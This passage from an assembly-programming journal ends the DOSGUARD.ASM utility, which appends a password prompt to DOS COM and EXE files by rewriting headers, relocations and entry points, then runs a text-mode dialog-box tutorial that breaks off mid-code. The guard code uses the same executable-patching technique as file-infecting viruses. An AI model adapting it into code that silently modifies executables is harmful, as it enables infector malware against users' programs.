MOVELOOP:
mov dx, offset buffer + 16
call READ_PAGE
call DECFP_PAGE
call WRITE_PAGE
call MOVE_PARA
dec cx
cmp cx, 1
jne MOVELOOP
LASTPAGE:
sub word ptr [lps], 16
mov cx, word ptr [lps]
mov dx, offset buffer + 16
mov ah, 3Fh
int 21h
push cx
mov dx, cx
neg dx
mov cx, -1
mov ax, 4201h
int 21h
pop cx
add cx, 16
mov dx, offset buffer
mov ah, 40h
int 21h
;Got to adjust the file size since it will be used later
add word ptr cs:[9Ah], 16
adc word ptr cs:[9Ch], 0
;Increment the header size within the EXE header
add word ptr cs:[exehead+8], 1
;Change Page Count and Last Page Size in EXE header
cmp word ptr [exehead+2], 496
jae ADDPAGE
add word ptr [exehead+2], 16
jmp HAVEROOM
ADDPAGE:
;Adjust the header to add a page if the 16 additional bytes run
;over to a new page.
inc word ptr [exehead+4]
mov ax, 512
sub ax, word ptr [exehead+2]
mov dx, 16
sub dx, ax
mov word ptr [exehead+2], dx
HAVEROOM:
mov ax, word ptr [exehead+14] ;save orig stack segment
mov [hosts], ax
mov ax, word ptr [exehead+16] ;save orig stack pointer
mov [hosts+2], ax
mov ax, word ptr [exehead+20] ;save orig ip
mov [hostc], ax
mov ax, word ptr [exehead+22] ;save orig cs
mov [hostc+2], ax
mov cx, word ptr cs:[9Ch] ;adjust file length to paragraph
mov dx, word ptr cs:[9Ah] ; boundary
or dl, 0Fh
add dx, 1
adc cx, 0
mov cs:[9Ch], cx
mov cs:[9Ah], dx
mov ax, 4200h ;move file pointer to end of file
int 21h ;plus boundary
mov cx, offset ENDGUARD2 - offset EXEGUARD ;write code to end
mov dx, offset EXEGUARD ;of the exe file
mov ah, 40h
int 21h
xor cx, cx ;Move file pointer to beginning of
file
xor dx, dx
mov ax, 4200h
int 21h
;adjust the EXE header and then write it back out
mov ax, word ptr cs:[9Ah] ;calculate module's CS
mov dx, word ptr cs:[9Ch] ;ax:dx contains orig file size
mov cx, 16 ;CS = file size / 16 - header size
div cx
sub ax, word ptr [exehead+8];header size in paragraphs
mov word ptr [exehead+22], ax ;ax is now initial cs
mov word ptr [exehead+14], ax ;ax is now initial ss
mov word ptr [exehead+20], 0 ;initial ip
mov word ptr [exehead+16], ENDGUARD2 - EXEGUARD + 100h ;initial
sp
mov dx, word ptr cs:[9Ch] ;calculate new size file size
mov ax, word ptr cs:[9Ah]
add ax, offset ENDGUARD2 - offset EXEGUARD + 200h
adc dx, 0
mov cx, 200h
div cx
mov word ptr [exehead+4], ax
mov word ptr [exehead+2], dx
add word ptr [exehead+6], 2
mov cx, 1Ch ;Write out the new header
mov dx, offset exehead
mov ah, 40h
int 21h
;modify relocatables table
mov ax, word ptr [exehead+6];Get the # of relocatables
dec ax ;Position to add relocatable equals
dec ax ;(# - 2)*4 + table offset
mov cx, 4
mul cx
add ax, word ptr [exehead+24]
adc dx, 0
mov cx, dx
mov dx, ax
mov ax, 4200h ;move file pointer to position
int 21h
;Use exehead as a buffer for relocatables.
;Put two pointers in this buffer, first points to ss in
;hosts and second points to cs in hostc.
mov word ptr [exehead], ENDGUARD2 - EXEGUARD - 10
mov ax, word ptr [exehead+22]
mov word ptr [exehead+2], ax
mov word ptr [exehead+4], ENDGUARD2 - EXEGUARD - 4
mov word ptr [exehead+6], ax
mov cx, 8
mov dx, offset exehead
mov ah, 40h ;Write the 8 bytes.
int 21h
mov ah, 3Eh ;Close the file.
int 21h
ret ;Done!
;-------------------------------------------------------------------------
;Procedure to calculate the amount that needs to be written
;-------------------------------------------------------------------------
CALC_SIZE:
;dx holds the position in the file where we want to start reading.
;So, the amount to read in and write back out is equal to the size
;of the file minus dx.
mov cx, word ptr [exehead+2]
mov word ptr [lps], cx ;Copy Last Page Size into lps
mov cx, word ptr [exehead+4];Copy Num Pages into cx
cmp dx, word ptr [lps] ;If bytes to subtract are less than
jbe FINDLPS ;lps then just subtract them and
exit
mov ax, dx
xor dx, dx
mov cx, 512
div cx ;ax = pages to subtract
mov cx, word ptr [exehead+4];dx = remainder to subtract from lps
sub cx, ax
cmp dx, word ptr [lps]
jbe FINDLPS
sub cx, 1
mov ax, dx
sub ax, word ptr [lps]
mov dx, 512
sub dx, ax
FINDLPS:
sub word ptr [lps], dx ;Subtract start position and leave
;Num Pages the same
ret
;-------------------------------------------------------------------------
;Procedure to read the EXE Header
;-------------------------------------------------------------------------
READ_HEADER:
xor cx, cx ;Move the file pointer back
xor dx, dx ;to the beginning of the file
mov ax, 4200h
int 21h
mov cx, 1Ch ;read exe header (28 bytes)
mov dx, offset exehead ;into buffer
mov ah, 3Fh
int 21h
ret ;return with cf set properly
;-------------------------------------------------------------------------
;Procedure to read a page
;-------------------------------------------------------------------------
READ_PAGE:
push ax
push cx
mov ah, 3Fh
mov cx, 512
int 21h
pop cx
pop ax
ret
;-------------------------------------------------------------------------
;Procedure to read a paragraph
;-------------------------------------------------------------------------
READ_PARA:
push ax
push cx
mov ah, 3Fh
mov cx, 16
int 21h
pop cx
pop ax
ret
;-------------------------------------------------------------------------
;Procedure to write a page
;-------------------------------------------------------------------------
WRITE_PAGE:
push ax
push cx
push dx
mov ah, 40h
mov cx, 512
mov dx, offset buffer
int 21h
pop dx
pop cx
pop ax
ret
;-------------------------------------------------------------------------
;Procedure to write a paragraph
;-------------------------------------------------------------------------
WRITE_PARA:
push ax
push cx
push dx
mov ah, 40h
mov cx, 16
mov dx, offset buffer
int 21h
pop dx
pop cx
pop ax
ret
;-------------------------------------------------------------------------
;Procedure to move file pointer back a page
;-------------------------------------------------------------------------
DECFP_PAGE:
push ax
push cx
push dx
mov ax, 4201h
mov cx, -1
mov dx, -512
int 21h
pop dx
pop cx
pop ax
ret
;-------------------------------------------------------------------------
;Procedure to move file pointer back a para
;-------------------------------------------------------------------------
DEC_PARA:
push ax
push cx
push dx
mov ax, 4201h
mov cx, -1
mov dx, -16
int 21h
pop dx
pop cx
pop ax
ret
;-------------------------------------------------------------------------
;Procedure to move the paragraph buffer to the front
;-------------------------------------------------------------------------
MOVE_PARA:
push cx
mov si, offset para
mov di, offset buffer
mov cx, 16
rep movsb
pop cx
ret
;-------------------------------------------------------------------------
;Code to add to COM files
;-------------------------------------------------------------------------
COMGUARD:
call GET_START
GET_START:
pop bp
sub bp, offset GET_START
mov ah, 9h ;DOS print string
lea dx, [bp + prompt] ;Print the password prompt
int 21h
lea di, [bp + guess]
xor cx, cx
READLOOP:
mov ah, 7h ;Read without echo
int 21h
inc cx ;Count of characters entered
stosb ;Store guess for comparison later
cmp cx, 10 ;Limit guess to 10 chars including
CR
je CHECKPASS
cmp al, 13 ;Quit loop when CR read
jne READLOOP
CHECKPASS:
lea di, [bp + guess] ;Setup for passwd checking loop
lea si, [bp +passwd] ;Setup addresses for cmpsb
xor cx, cx ;Set counter to zero
cld ;Tell cmpsb to increment si and di
CHECKLOOP:
cmpsb ;Compare passwd with guess
jne FAIL ;Abort program if password is wrong
inc cx ;Increment counter
cmp cx, 8 ;Only check first 8 chars
jne CHECKLOOP ;Loop until you've read first 8
SUCCESS:
mov cx, 5
cld
lea si, [bp + obytes]
mov di, 100h
rep movsb
push 100h ;return from the jump to execute
ret ;the host program
FAIL:
mov ah, 9h ;DOS print string
lea dx, [bp + badpass] ;Print bad password msg
int 21h
mov ax, 4C00h
int 21h
prompt DB 'password: ','$'
badpass DB 'Invalid password!','$'
passwd DB 'smcrocks'
guess DB 10 dup (0)
obytes DB 0,0,0,0,0
ENDGUARD:
;-------------------------------------------------------------------------
;Code to add to EXE files
;-------------------------------------------------------------------------
EXEGUARD:
push ax ;Save startup value in ax
push ds ;Save value of ds
mov ax, cs ;Put cs into ds and es
mov ds, ax
mov es, ax
mov bp, offset ENDGUARD2 - offset EXEGUARD
mov ax, [bp-4]
mov ah, 9h ;DOS print string
lea dx, [bp-57] ;Print the password prompt
int 21h
lea di, [bp-20]
xor cx, cx
EREADLOOP:
mov ah, 7h ;Read without echo
int 21h
inc cx ;Count of characters entered
stosb ;Store guess for comparison later
cmp cx, 10 ;Limit guess to 10 chars including
CR
je ECHECKPASS
cmp al, 13 ;Quit loop when CR read
jne EREADLOOP
ECHECKPASS:
lea di, [bp-20] ;Setup for passwd checking loop
lea si, [bp-28] ;Setup addresses for cmpsb
xor cx, cx ;Set counter to zero
cld ;Tell cmpsb to increment si and di
ECHECKLOOP:
cmpsb ;Compare passwd with guess
jne EFAIL ;Abort program if password is wrong
inc cx ;Increment counter
cmp cx, 8 ;Only check first 8 chars
jne ECHECKLOOP ;Loop until you've read first 8
ESUCCESS:
pop ds
mov ax, ds
mov es, ax
pop ax
cli
mov ss, word ptr cs:[bp-10]
mov sp, word ptr cs:[bp-8]
sti
xor cx, cx
xor dx, dx
xor bp, bp
xor si, si
xor di, di
lahf
xor ah, ah
sahf
jmp dword ptr cs:[ENDGUARD2-EXEGUARD-6]
EFAIL:
mov ah, 9h ;DOS print string
lea dx, [bp-46] ;Print bad password msg
int 21h
mov ax, 4C00h
int 21h
eprompt DB 'password: ','$'
ebadpass DB 'Invalid password!','$'
epasswd DB 'smcrocks'
eguess DB 10 dup (0)
hosts DW 0, 0
hostc DW 0, 0
delta DW 0
ENDGUARD2:
filter1 DB '*.com',0
filter2 DB '*.exe',0
bytes DB 0,0,0,'CG'
exehead DB 28 dup (0)
buffer DB 512 dup (0)
para DB 16 dup (0)
lps DW 0
END START
---------------------------END
DOSGUARD.ASM------------------------------------
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Creating a User-Friendly
Interface
by S Sirajudeen
Now a days, a programmer of any language has to include user friendly
features in his commercial software, since users desire user friendliness
for easy use. For example, Windows is the most popular OS due to its
Graphical
User Interface.
For an assembly language programmer who tries to develop a DOS-based
program, it is drudgery and challenging to incorporate even a few basic
features of graphical interface like that of Windows.
Sometimes, in assembly language, the time taken to develop the core
of a software may be very less than writing code for its user interface. For
instance, assume that we're writing an addition program which displays a
dialog box to input two numbers and displays result in a dialog box.
Here,the
dialog box is the user interface. What we have to do in this program is,
* Displaying a dialog box.
* Receiving the numbers to be added as string.
* Checking the string whether it contains alphabets and graphics
characters. If so, prompting the user to reenter the numbers.
* Converting the ASCII digits into binary form.
* Performing binary multibyte addition..
* Converting sum which is binary into ASCII digits.
* Displaying sum in a dialog box.
Our intention is only the addition of two numbers. But we have to spend more
time in the user interface design than for addition.
As I say these things, you may become frustrated and decide to skip
user
interface design. Still, in developing utilities or packages for commercial
purpose, a programmer will have to do these things to accomodate users. This
is why I present this article.
This article will focus on user friendly features in DOS text mode.
In DOS text mode, user friendly means features such as menus, message box,
dialog box, list box, text window, radio button, status bar, mouse support
etc.
In this article, I will cover only an about message box and a dialog
box.
However, knowledge of interrupts (for screen and mouse handling) is
essential,
even for a C/C++ programmer, to incorporate user friendly features in a DOS
based program.
GETTING STARTED:
Before going on, some things must be cleared.
i) A text can be displayed in one of the following ways
1) Direct access of video memory
2) Using INT 21h
3) Using INT 10h
In the examples of this article, I have used the function 0Eh of INT 10h
to display text.
ii) To make the example programs as straightforward, I have used |, -
and + as the box characters in the dialog box, since actual box
characters
are EXTENDED ASCII characters which are not allowed in a text article.
The content of dialog box is labeled as DIALOG_BOX_TEXT.
Before compiling this program, in the content of the dialog box,
PLEASE REPLACE the characters |, - and + with the BOX CHARACTERS which
are specified below.
--------------------------------------
ASCII code Description
--------------------------------------
179 | Vertical bar
196 -- Horizontal bar
218 | Upper left corner
191 | Upper right corner
192 |_ Lower left corner
217 _| Lower right corner
--------------------------------------
EXAMPLE 1:
First of all, we're going to put a zooming message box in our program.
It
is an introduction to second example.
You may be seen that some utlities such as Norton Utilities display
zooming message box to alert users.
What this program does is
- n boxes of different size, are continously displayed one after
another for n seconds each. In this case, each time a box
which is larger than previous one is displayed.
It seems like the box is zooming.
LOGIC:
Assume that displaying boxes which are larger than previously
displayed box, means enalarging/zooming the previously displayed
box.
i) Zoom box by n rows
ii) Zoom box by n columns
iii) Zooming box for n times
- It displays horizontal and vertical shadows for the box
- Finally displays text within the box
What you will learn:
i) Screen handling using BIOS interrupt 10h
ii) An introduction to learn the second example.
Below is the source code of our simple program.
;;
+------------------------------------------------------------------------+
;; | Program : MSGBOX.ASM
|
;; | Purpose : Demonstration program about Message Box
|
;; | Assembler : TASM
|
;;
+------------------------------------------------------------------------+
;; MACROS in this program : @SetTextMode, @Cursor, @Display, @Window,
@Delay
;; PROCEDURES in this program: Message_box, Window
;;///////////////////////////////////////////////////////////////////////;;
.386
MODEL USE16 TINY ;; @Always must be TINY model
;;///////////////////////////////////////////////////////////////////////;;
DATASEG ;; Initialize variables
RED EQU 4fh ;; @Color values
BLACK EQU 0fh
BLUE EQU 1fh
screen EQU BLUE
shadow_colour EQU BLACK
box_background_colour EQU RED
;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
nl EQU 0Dh,0Ah
label dialog_box_text
db nl
db nl,'
+-------------------------+--------------------------------------+'
db nl,' | ::/ \::::::. | Program to Display a Message Box
|'
db nl,' | :/___\:::::::. |
|'
db nl,' | /| \::::::::. | Written By S.SIRAJUDEEN.
|'
db nl,' | :| _/\:::::::::. | E-Mail: ssirajudeen@...
|'
db nl,' | :| _|\ \::::::::::. |
|'
db nl,' | :::\_____\::::::::::. | Published in ASMJOURNAL
|'
db nl,' | ::::::::::::::::::::::. | Internet:
asmjournal.freeservers.com |'
db nl,' | AsmJournal |
|'
db nl,'
+-------------------------+--------------------------------------+'
db nl,' | # If you have any comments or suggestions then please email
me|'
db nl,' | at ssirajudeen@...
|'
db nl,'
+----------------------------------------------------------------+'
db nl,nl,nl,nl
count dw $-offset dialog_box_text
;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
upper_x equ 08 ;; Upper left corner of the box to be zoomed
upper_y equ 37
lower_x equ 08 ;; Lower right corner of the box to be zoomed
lower_y equ 39
left_x db upper_x ;; Variables to hold the UPPER LEFT coordinates of the
left_y db upper_y ;; next box to be displayed
right_x db lower_x ;; Variables to hold the LOWER RIGHT coordinates of the
right_y db lower_y ;; next box to be displayed
shadow_vertical_left_x db upper_x+1 ;; Don't Change!
shadow_vertical_left_y db lower_y+1 ;; Coordinates to display the
VERTICAL
shadow_vertical_right_x db lower_x+1 ;; shadow of message box.
shadow_vertical_right_y db lower_y+2
shadow_horizontal_left_x db lower_x+1 ;; Don't Change!
shadow_horizontal_left_y db upper_y+2 ;; Coordinates to display the
HORIZONTAL
shadow_horizontal_right_x db lower_x+1 ;; shadow of message box
shadow_horizontal_right_y db lower_y+2
;;//////////////////////////////////////////////////////////////////////;;
UDATASEG
DW 100H DUP (?)
MyStack LABEL WORD
;;--------------------------< @SetTextMode >------------------------;;
@SetTextMode MACRO
mov ax,0003h
int 10h
ENDM ;;End of macro
;;----------------------------< @Cursor >---------------------------;;
;;PURPOSE : Macro to move cursor
;;SYNTAX : @Cursor <row>, <col>
@Cursor MACRO ROW,COL
mov ah,02
mov bh,00
mov dh,ROW
mov dl,COL
int 10h
ENDM ;;End of macro
;;----------------------------< @Display >---------------------------;;
;;PURPOSE: Macro to display a text
;;SYNTAX : @DISPLAY <text width>, <text address>
@Display MACRO xcount, address
LOCAL display_text
mov cx, xcount ;; Number of characters to be displayed
mov bx, offset address
display_text:
mov ah,0Eh ;; Display the text
mov al,byte ptr [bx]
push bx
mov bh,00
mov bl,07h
int 10h
pop bx
inc bx ;; Point to next character
loop far ptr cs:display_text
ENDM ;;End of macro
;;-----------------------------< @Window >----------------------------;;
;;PURPOSE : Macro to display a window with a given color as background
;;SYNTAX : @window <bacground color>,
;; <Upper letf row of user window>, <Upper left column>,
;; <Lower right row of user window>, <Lower right column>
@window MACRO color, lrow, lcol, rrow, rcol
mov ah,06
mov al,00
mov bh, color ;; Background Color
mov ch, lrow
mov cl, lcol
mov dh, rrow
mov dl, rcol
int 10h
ENDM ;;End of macro
;;-----------------------------< @Delay >-----------------------------;;
@delay MACRO
mov ah,86h ;; Execute a time delay
mov dx,4500h ;;9000
mov cx,0000h
int 15h
ENDM ;;End of macro
;;///////////////////////// MAIN PROGRAM /////////////////////////////;;
CODESEG ;; This marks the start of executable code
STARTUPCODE
mov sp,offset MyStack
push cs ;; Initialize segment registers.
pop ds
push cs
pop ss
mov ah,0Bh ;; Display screen border in WHITE color
mov bx,0007h
int 10h
call message_box ;; Display the message box
mov ax,4C00h ;; Terminate the program.
int 21h
;;//////////////////////////// Message_box ///////////////////////////;;
Message_box PROC
@SetTextMode
@cursor 00,00 ;; Position cursor at 00,00.
@window screen,00,00,24,79 ;; @Clear screen
;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
mov cx,0008h ;; Don't change! Calculate how many times to zoom.
zoom:
push cx ;; @@Display a window which is zooming.
call window
pop cx
loop zoom
;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
@display count, dialog_box_text
ret
Message_box ENDP
;;/////////////////////////// Window ///////////////////////////////;;
Window PROC
;;Display a window with BLUE colour as background.
@window box_background_colour, left_x, left_y, right_x, right_y
dec byte ptr left_x
sub cl,5
mov byte ptr left_y,cl
inc byte ptr right_x
add dl,5
mov byte ptr right_y,dl
;;---------------------------------------------------------------------;;
;;Display a horizontal shadow.
@window shadow_colour,shadow_vertical_left_x,shadow_vertical_left_y,
shadow_vertical_right_x,shadow_vertical_right_y
dec byte ptr shadow_vertical_left_x
add cl,5
mov byte ptr shadow_vertical_left_y,cl
inc byte ptr shadow_vertical_right_x
add dl,5
mov byte ptr shadow_vertical_right_y,dl
;;--------------------------------------------------------------------;;
;;Display a horizontal shadow.
@window shadow_colour,shadow_horizontal_left_x,
shadow_horizontal_left_y,
shadow_horizontal_right_x,shadow_horizontal_right_y
inc byte ptr shadow_horizontal_left_x
sub cl,5
mov byte ptr shadow_horizontal_left_y,cl
inc byte ptr shadow_horizontal_right_x
add dl,5
mov byte ptr shadow_horizontal_right_y,dl
;;--------------------------------------------------------------------;;
@delay
ret
Window ENDP
END
;;////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\;;
EXAMPLE 2:
Well, next we're going to put a DIALOG BOX in our program.
What it does is:
- Displays a dialog box with YES and NO buttons
- Supports button selection using mouse
(i) Checks for mouse installation
(ii) Shows mouse pointer
(iii) Captures button click of the left mouse button
- Checks for keyboard input
(i) Checks whether EXTENDED keys has pressed
(ii) Checks whether ENTER or TAB key has pressed
- Toggles button selection, on presssing TAB, LEFT ARROW key or RIGHT
ARROW key.
- On pressing ENTER key or clicking OK/YES button, displays different
messages according to button selection and terminates.
What we will learn from this example is:
(i) Mouse handling
(ii) Screen handling using BIOS interrupt 10h
(iii) Key board handling using BIOS interrupt 16h
(iv) Idea of user interface design
I made the following program very straightforward and ignored code
optimization to reduce complexity.
;;
+-------------------------------------------------------------------------+
;; | Program : DLGBOX.ASM
|
;; | Purpose : Demonstration program about Dialog Box with YES & NO button
|
;; | Features : Supports mouse for button selection
|
;; | Assembler : TASM
|
;; | Required Knowledge: INT 21h, INT 10h, INT 16h, INT 33h & Scan Code
|
;;
+-------------------------------------------------------------------------+
;; MACROS in this program : @Cursor, @Display, @window, @Yes & @No
;; PROCEDURES in this program: Dialog_box
;;///////////////////////////////////////////////////////////////////////;;
.386
MODEL USE16 TINY ;; @Always must be TINY model
;;///////////////////////////////////////////////////////////////////////;;
DATASEG ;; Initialize variables
mouse db 'n' ;; Flag to indicate the availability of mouse
mouse_x db 0 ;; Keep track of position of mouse cursor
mouse_y db 0
m_x dw 00
m_y dw 00
left_mouse_button db 0 ;; Flag updated on clicking the left mouse button
;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
RED EQU 4fh ;; @Color values
CYAN EQU 3fh
BLACK EQU 0fh
BLUE EQU 1fh
WHITE EQU 7fh
box_height EQU 10
box_width EQU 46
left_x EQU 7 ;; Upper left corner of user window
left_y EQU 20
right_x EQU left_x+box_height-1 ;; Calculate lower right corner of user
window
right_y EQU left_y+box_width-1
upper_left_row db left_x
upper_left_col db left_y
box_background_color EQU RED ; Background color of dialog box
nl EQU 0Dh,0Ah ; New line
label dialog_box_text
db '+--------------- USER COMMENT ---------------+' ;Dialog box. The
variable
db '| |' ;dialog_box_text
contains
db '| Written By S.Sirajudeen |' ;10 lines; width of each
db '| E-mail: ssirajudeen@... |' ;line is 46 characters.
db '| |'
db '| HAVE YOU ENJOYED THIS PROGRAM? |' ;NOTE:
db '| |' ;If you edit here, you
db '| Yes # No # |' ;should UPDATE the
db '| ####### ####### |' ;text_width and
db '+--------------------------------------------+' ;text_line_count.
count dw $-offset dialog_box_text
text_line_count EQU 10 ;; Variable dialog_box_text contains 10 lines
text_width EQU 46 ;; and width of each line is 46 characters
;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
shadow EQU WHITE ;; color of button shadow
;;NOTE: Width of 'yes' and 'yes_button' should be same.
yes_button db 17,' Yes ',16 ;; Displayed on YES button has selected
yes db ' Yes '
yes_horz_shadow db 7 dup(223)
yes_char_count EQU 7
;;NOTE: Width of 'no' and 'no_button' should be same.
no_button db 17,' No ',16 ;; Displayed on NO button has selected
no db ' No '
no_horz_shadow db 7 dup(223)
no_char_count EQU 7
vert_shadow db 220
yes_x EQU right_x-2 ;; Coordinate where YES button to displayed
yes_y EQU left_y+(box_width/2)-yes_char_count-4 ;;32
no_x EQU right_x-2 ;; Coordinate where NO button to displayed
no_y EQU left_y+(box_width/2)+1 ;;44
select EQU BLUE ;; @Background color to highlight the button selection
unselect EQU BLACK
button db 'y' ;; @Flag to keep track of the button selection. If the value
;; is 'y', the YES button has selected; 'n' for the NO button.
;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
label thank_you ;; Message to be displayed upon YES button has pressed
db 07,' Written By S.SIRAJUDEEN',nl
db
'4/55,L.M.BUILDING,KUMARESAPURAM,KUTHAPAR(PO),TRICHY-620013,TAMILNADU,INDIA'
db nl,' Email: ssirajudeen@...'
db nl,nl,' Thank you! Good-bye!!'
thank_you_count dw $-thank_you
label suggest ;; Message to be displayed upon NO button has pressed
db 7h,' If you have any comments or suggestions, then please mail me
at'
db nl,' ssirajudeen@...'
db nl
suggest_count dw $-suggest
;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
;; -------------+----------- When a key has pressed, it returns a code.
;; |Extended Keys| Scan Code | This code is called SCAN CODE.
;; |-------------+-----------| Alphanumeric keys, tab, space and escape
;; | Left Arrow | 75 | keys return one byte code. But Extended
;; | Right Arrow | 77 | keys return two bytes code. The first byte
;; | Up Arrow | 72 | always 0. The second is the actual scan code.
;; | Down Arrow | 80 | Arrow keys, Home, End, PageUp, Page Down,
;; -------------+----------- Insert, Delete, Function keys, Pause/break,
;; Scroll Lock & Print Screen are called
EXTENDED
;; KEYs.
LEFT_ARROW equ 75 ;; Scan code of LEFT ARROW key is 75
RIGHT_ARROW equ 77 ;; ,, RIGHT ARROW keyis 77
TAB_KEY equ 9 ;; Scan code of TAB key is 9
ENTER_KEY equ 13 ;; ,, ENTER key is 13
;;//////////////////////////////////////////////////////////////////////;;
UDATASEG
DW 50H DUP (?)
MyStack LABEL WORD
;;----------------------------< @Cursor >---------------------------;;
;;PURPOSE : Macro to move cursor
;;SYNTAX : @Cursor <row>, <col>
@Cursor MACRO ROW,COL
mov ah,02
mov bh,00
mov dh,ROW
mov dl,COL
int 10h
ENDM ;;End of macro
;;----------------------------< @Display >---------------------------;;
;;PURPOSE: Macro to display a text
;;SYNTAX : @DISPLAY <text width>, <text address>
@Display MACRO xcount, address
LOCAL display_text
mov cx, xcount ;; Number of characters to be displayed
mov bx, offset address
display_text:
mov ah,0Eh ;; Display the text
mov al,byte ptr [bx]
push bx
mov bh,00
mov bl,07h
int 10h
pop bx
inc bx ;; Point to next character
loop far ptr cs:display_text
ENDM ;;End of macro
;;----------------------------< @window >-----------------------------;;
;;PURPOSE : Macro to display a window with a given color as background
;;SYNTAX : @window <bacground color>,
;; <Upper letf row of user window>, <Upper left column>,
;; <Lower right row of user window>, <Lower right column>
@window MACRO color, lrow,lcol, rrow, rcol
mov ah,06
mov al,00
mov bh, color ;;Background Color
mov ch, lrow
mov cl, lcol
mov dh, rrow
mov dl, rcol
int 10h
ENDM ;;End of macro
;;------------------------< @button_shadow >--------------------------;;
;;PURPOSE ; Macro to pad the button with horizontal and vertical char to
;; make it as 3D button.
@button_shadow MACRO
@Cursor yes_x+1, yes_y+1 ;; Display horizontal shadow of YES
button
@Display yes_char_count, yes_horz_shadow
@Cursor yes_x, yes_y+yes_char_count ;; Display vertical shadow
@Display 1, vert_shadow
@Cursor no_x+1, no_y+1 ;; Display horizontal shadow of NO
button
@Display no_char_count, no_horz_shadow
@Cursor no_x, no_y+no_char_count ;; Display vertical shadow
@Display 1, vert_shadow
ENDM
;;-----------------------------< @Yes >-------------------------------;;
;;PURPOSE : Macro to select the YES button.
;; In other words, a window which is used as YES button is
displayed
@Yes MACRO
mov button, 'y' ;; DON'T CHANGE! ; Update flag
@window select, yes_x, yes_y, yes_x, yes_y+(yes_char_count-1)
@window unselect, no_x, no_y, no_x, no_y+(no_char_count-1)
@Cursor yes_x,yes_y ;; Move cursor to YES button
@Display yes_char_count,yes_button ;; Display label of YES
@Cursor no_x,no_y ;; Move cursor to NO button
@Display no_char_count, no ;; Display label of NO button
ENDM ;;End of macro
;;-----------------------------< @No >--------------------------------;;
;;PURPOSE : Macro to select the NO button
;; In other words, a window which is used as NO button is displayed
@No MACRO
mov button, 'n' ;; DON'T CHANGE! ; Update flag
@window unselect,yes_x, yes_y, yes_x, yes_y+(yes_char_count-1)
@window select, no_x, no_y, no_x, no_y+(no_char_count-1)
@Cursor yes_x,yes_y
@Display yes_char_count, yes
@Cursor no_x,no_y
@Display no_char_count, no_button
ENDM ;;End of macro
;;//////////////////////// MAIN PROGRAM /////////////////////////////;;
CODESEG ;;This marks the start of executable code
STARTUPCODE
mov sp,offset MyStack
push cs ;;Initialize segment registers.
pop ds
push cs
pop ss
;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
@window BLACK, 00, 00, 24, 79 ;;@Clear screen
call Dialog_box ;;Display the dialog box
display_thank_u:
cmp button,'y' ;; Check whether YES button has pressed/clicked
jne display_suggestion
@Display thank_you_count, thank_you
jmp _end
display_suggestion: ;; NO button has pressed/clicked
@Display suggest_count, suggest
;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
_end:
mov ax,4C00h ;; Terminate the program.
int 21h
;;/////////////////////////// Dialog_box ////////////////////////////;;
Dialog_box PROC
mov ax,0003 ;; Don't change! Set text mode in 3. Changing this mode
int 10h ;; causes different resolution. Mouse movement is converted
;; into rows and columns based on the resolution of text
mode.
mov ax,00 ;; Reset mouse
int 33h
cmp ax,00 ;; Check for error
je start
mov ax,01 ;; Show mouse pointer
int 33h
mov mouse, 'y'
;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
start:
@window box_background_color,left_x,left_y,right_x,right_y ;;Display a
BOX
@Cursor left_x,left_y ;; Move cursor to upper left corner of dialog
box
mov cx, text_line_count ;; Display n lines as dialog box text
mov bx, offset dialog_box_text ;; Address of text
next_line:
push bx ;; OUTER LOOP
push cx
mov cx,00 ;; INNER LOOP
mov cl, text_width
display_text:
mov ah,0Eh ;; Display the text
mov al,byte ptr [bx]
push bx
mov bh,00
mov bl,07h
int 10h
pop bx
inc bx
loop far ptr cs:display_text ;; INNER LOOP
pop cx
pop bx
mov dx,00 ;; Calculate address of next line
mov dl, text_width
add bx, dx
inc byte ptr upper_left_row
push bx
@Cursor upper_left_row, upper_left_col ;; Move cursor to next line
within
pop bx ;; dialog box
loop far ptr cs:next_line ;; OUTER LOOP
@button_shadow
;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
_yes:
@Yes ;; Select the YES button
cmp left_mouse_button,01
je _end_proc
jmp mouse_check
_no:
@No ;;Select the NO button
cmp left_mouse_button,01
je _end_proc
mouse_check:
cmp mouse, 'y' ;; Check whether mouse is available
jne key_check
mov ax,03 ;; Get mouse cursor position
int 33h
mov left_mouse_button,bl
mov word ptr m_x,dx
mov word ptr m_y,cx
mouse_button:
and left_mouse_button, 01 ;; Check whether left mouse button has
pressed
cmp left_mouse_button, 01
jne key_check
mouse_row:
mov mouse_x,0 ;; Mouse movement is converted into rows and
columns
;; to calculate the position of mouse cursor
cmp word ptr m_x,00
je mouse_col
mov ax,word ptr m_x ;; In the text mode 3, to calculate the current
ROW,
mov bl,8 ;; divide the position value for VERTICAL
movement
div bl ;; by 8.
mov mouse_x, al
mouse_col:
mov mouse_y,0 ;; Mouse movement is converted into rows and
columns
;; to calculate the position of mouse cursor
cmp word ptr m_y,00
je key_check
mov ax, word ptr m_y ;; In the text mode 3, to calculate the current
COLUMN,
mov bl,8 ;; divide the position value for HORIZONTAL
movement
div bl ;; by 8.
mov mouse_y, al
mouse_yes:
mov al, mouse_x
cmp al, yes_x ;; Check whether mouse has clicked anywhere on
jne mouse_no ;; the row where YES button is displayed
mov al, mouse_y
cmp al, yes_y
jb mouse_no
cmp al, yes_y+(yes_char_count-1)
ja mouse_no
mov button, 'y'
jmp _yes
mouse_no:
mov al, mouse_x
cmp al, no_x ;; Check whether mouse has clicked anywhere on
jne key_check ;; the row where NO button is displayed
mov al, mouse_y
cmp al, no_y
jb key_check
cmp al, no_y+(no_char_count-1)
ja key_check
mov button, 'n'
jmp _no
key_check:
mov ah,01 ;; @Check whether any character is in keyboard
buffer
int 16h
jz mouse_check
